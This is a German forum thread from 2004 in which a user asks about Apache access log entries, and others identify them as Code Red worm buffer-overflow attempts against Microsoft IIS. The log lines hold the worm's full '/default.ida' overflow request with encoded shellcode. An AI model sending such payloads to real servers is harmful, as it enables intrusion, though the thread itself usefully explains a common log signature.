Rund um die Sicherheit des Systems und die Applikationen
format-c
Posts: 4 Joined: 2003-12-10 21:59
Post
by format-c » 2004-01-09 15:44
81.248.14.81 - - [08/Jan/2004:23:22:41 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
81.248.14.81 - - [09/Jan/2004:01:24:59 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
81.49.209.207 - - [09/Jan/2004:05:15:05 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
212.202.43.165 - - [09/Jan/2004:07:27:26 +0100] "GET /mod_ssl:error:HTTP-request HTTP/1.0" 400 562
da habsch ich meiner access log in für httpd gefunden
kann mir einer sagne was das is hab das jetzt schon paar mal in meiner log und auch auf nen andern server
for help währe ich dankbar
chris76
Posts: 1878 Joined: 2003-06-27 14:37
Location: Germering
Post
by chris76 » 2004-01-09 15:46
Ich würde mal sagen da hat jemad versucht einen Buffer overflow zu verursachen
format-c
Posts: 4 Joined: 2003-12-10 21:59
Post
by format-c » 2004-01-09 15:47
kann mir das was anhaben :?
format-c
Posts: 4 Joined: 2003-12-10 21:59
Post
by format-c » 2004-01-09 15:51
hm wenn ich dem englischen mächtig bin soll das heissen nein :)
nur windows webserver oda
captaincrunch
Userprojekt
Posts: 7066 Joined: 2002-10-09 14:30
Location: Dorsten
Contact:
Post
by captaincrunch » 2004-01-09 15:57
Du kannst gerne auch nach deutschsprachigen Google-Einträgen über Code Red suchen. ;)
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
chris76
Posts: 1878 Joined: 2003-06-27 14:37
Location: Germering
Post
by chris76 » 2004-01-09 15:57
Last edited by
chris76 on 2004-01-09 15:59, edited 1 time in total.
format-c
Posts: 4 Joined: 2003-12-10 21:59
Post
by format-c » 2004-01-09 15:58
Betroffen sind die Microsoft Webserver von NT 4.0 und Windows 2000.
schön :)
da kann ich ja beruhigt mein newbie dasein leben :9
mtealc
Posts: 11 Joined: 2003-03-07 11:34
Location: INGOLSTADT
Contact:
Post
by mtealc » 2004-01-10 00:21
die webserver müßten doch schon alle gepatch sein oder gibts da immer noch ein paar windoff-admins die es veräumt haben?
:lol:
Joe User
Project Manager
Posts: 11191 Joined: 2003-02-27 01:00
Location: Hamburg
Contact:
Post
by Joe User » 2004-01-10 09:42
MTealc wrote: die webserver müßten doch schon alle gepatch sein oder gibts da immer noch ein paar windoff-admins die es veräumt haben?
:lol:
Wenn's denn nur ein paar wären...